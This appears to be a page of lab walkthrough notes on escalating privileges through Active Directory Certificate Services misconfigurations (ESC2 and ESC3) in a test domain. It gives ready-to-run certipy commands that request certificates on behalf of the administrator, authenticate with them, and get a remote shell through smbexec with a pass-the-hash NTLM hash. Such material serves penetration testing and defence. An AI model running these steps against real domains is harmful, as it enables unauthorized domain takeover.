ADCS - ESC2 & ESC3

  • in order to abuse this misconfiguration, the following conditions must be met:

    1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

    2. Manager approval is disabled. Details are the same as in ESC1.

    3. No authorized signatures are required. Details are the same as in ESC1.

    4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

    5. The certificate template defines Any Purpose EKUs or no EKU.

Query cert

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA

  • Query cert with the Certificate Request Agent certificate we get before (-pfx)

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx

  • Auth

sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Get Shell or POWERSHELL :)

smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell

  • We also can do the same with the ESC3-CRA and ESC3 templates in the lab :

Enrollment Agent Templates — ESC3

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.

  6. Enrollment agent restrictions are not implemented on the CA.

certipy req -u  joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
certipy req -u  joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx  joaquin.Pereida.pfx
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12

PreviousADCS - ESC1NextADCS - ESC4

Last updated